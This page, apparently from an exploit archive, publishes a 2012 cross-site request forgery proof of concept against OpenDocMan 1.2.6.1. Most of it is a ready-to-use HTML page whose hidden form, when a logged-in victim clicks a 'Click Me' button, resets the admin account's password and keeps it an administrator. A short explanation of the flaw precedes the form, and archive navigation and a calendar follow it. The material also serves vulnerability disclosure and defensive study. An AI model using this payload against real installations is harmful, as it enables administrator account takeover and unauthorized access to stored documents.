exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

OpenDocMan 1.2.6.1 Cross Site Request Forgery

OpenDocMan 1.2.6.1 Cross Site Request Forgery
Posted Aug 22, 2012
Authored by Shai rod

OpenDocMan version 1.2.6.1 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 4517da3cfba89fe1336b3b7a7ed87a979770c9d980737cf914add115f588b397

OpenDocMan 1.2.6.1 Cross Site Request Forgery

Change Mirror Download
# Exploit Title: OpenDocMan Password Change CSRF
# Date: 22/08/2012
# Exploit Author: Shai rod (@NightRang3r)
# Vendor Homepage: http://www.opendocman.com/
# Software Link: https://github.com/downloads/opendocman/opendocman/opendocman-1.2.6.1.tar.gz
# Version: 1.2.6.1

#Gr33Tz: @aviadgolan , @benhayak, @nirgoldshlager, @roni_bachar

<html>
<head>
<title>OpenDocMan v1.2.6.1 Password Change CSRF</title>
</head>
<body>
<pre>

About the Application:
======================

OpenDocMan is a free, open source web-based PHP document management system (DMS) designed to comply with ISO 17025 and OIE standard for
document management. It features web based access, fine grained control of access to files, and automated install and upgrades.

Vulnerability Details:
======================

OpenDocMan is vulnerable to a CSRF which allows an attacker to change users password and profile details.
In order to change user details the attacker must know the user id, for example; the default id for the "admin" user is 1.
The victim must be logged in while clicking the malicious link.


<center>
<h2>Change Admin Password</h2>
</center>
</pre>
<center>
<form action="http://10.0.0.12/open/user.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="caller" value="/open/profile.php" />
<input type="hidden" name="id" value="1" />
<input type="hidden" name="last_name" value="Admin" />
<input type="hidden" name="first_name" value="Admin" />
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="phonenumber" value="
" />
<input type="hidden" name="password" value="qwe123" />
<input type="hidden" name="Email" value="admin@example.com" />
<input type="hidden" name="department" value="1" />
<input type="hidden" name="admin" value="1" />
<input type="hidden" name="department_review[]" value="1" />
<input type="hidden" name="set_password" value="0" />
<input type="hidden" name="submit" value="Update User" />
<input type="submit" value="Click Me" />
</form>
</center>
</body>
</html>

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close